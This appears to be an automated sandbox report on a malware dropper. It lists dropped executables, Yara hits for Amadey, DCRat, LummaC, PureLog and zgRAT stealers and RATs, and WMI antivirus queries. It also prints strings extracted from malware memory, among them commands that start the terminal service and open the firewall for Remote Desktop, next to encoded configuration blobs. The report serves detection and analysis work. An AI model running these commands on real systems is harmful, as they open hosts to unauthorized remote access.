Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169790101\ADFoyxP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169800101\HmngBpR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169800101\HmngBpR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169810101\v6Oqdnc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169810101\v6Oqdnc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169830101\P2SXMuh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169830101\P2SXMuh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169840101\0uzaP1a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169840101\0uzaP1a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169850101\6z1l5Yn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169850101\6z1l5Yn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169860101\8p5Lrev.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169860101\8p5Lrev.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169870101\7T7bCyA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169870101\7T7bCyA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169880101\EJmAkGq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169880101\EJmAkGq.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\pack82.vbe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Queries volume information: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Queries volume information: C:\Windows\twain_32\1u58lIqYIC.exe VolumeInformation
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation

Source: C:\Users\user\Desktop\download.php.exe.bin.exe

Code function: 0_2_00C57155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00C57155

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 15_2_00D561F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegSetValueExA,RegOpenKeyExA,RegEnumValueA,DeleteObject,DeleteObject,DeleteObject,LookupAccountNameA,

15_2_00D561F0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E22BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

1_2_00E22BFB

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1357003486.0000000000D51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1343523604.0000000000D51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1303062530.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1656544748.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1314521157.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1316415954.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1274040758.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe, type: DROPPED

Yara detected DCRat

Source: Yara match	File source: 35.2.8p5Lrev.exe.431080.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.0.1u58lIqYIC.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.431080.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.3742025173.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3742025173.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.2013094755.0000000000DD2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3742025173.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2013652365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\1u58lIqYIC.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Gr2GcblCRURZoQ7.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: 47.2.ClhN6R8.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.P2SXMuh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.ClhN6R8.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.P2SXMuh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7T7bCyA.exe.3190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.2Q0510.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2466510789.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1823004473.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.3736493816.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3119591927.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 35.2.8p5Lrev.exe.431080.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.0.1u58lIqYIC.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.8p5Lrev.exe.431080.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.3742025173.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3742025173.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.2013094755.0000000000DD2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3742025173.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2013652365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\1u58lIqYIC.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\Gr2GcblCRURZoQ7.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: 47.2.ClhN6R8.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.P2SXMuh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.ClhN6R8.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.P2SXMuh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7T7bCyA.exe.3190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.2Q0510.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2466510789.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1823004473.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.3736493816.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3119591927.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe, type: DROPPED

Contains functionality to start a terminal service

Source: 1Z46i3.exe	String found in binary or memory: net start termservice
Source: 1Z46i3.exe, 00000003.00000002.1314521157.0000000000D71000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: net start termservice
Source: 1Z46i3.exe, 00000003.00000002.1314521157.0000000000D71000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 1Z46i3.exe, 00000003.00000003.1274040758.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 1Z46i3.exe, 00000003.00000003.1274040758.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000009.00000002.1343523604.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000009.00000002.1343523604.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS 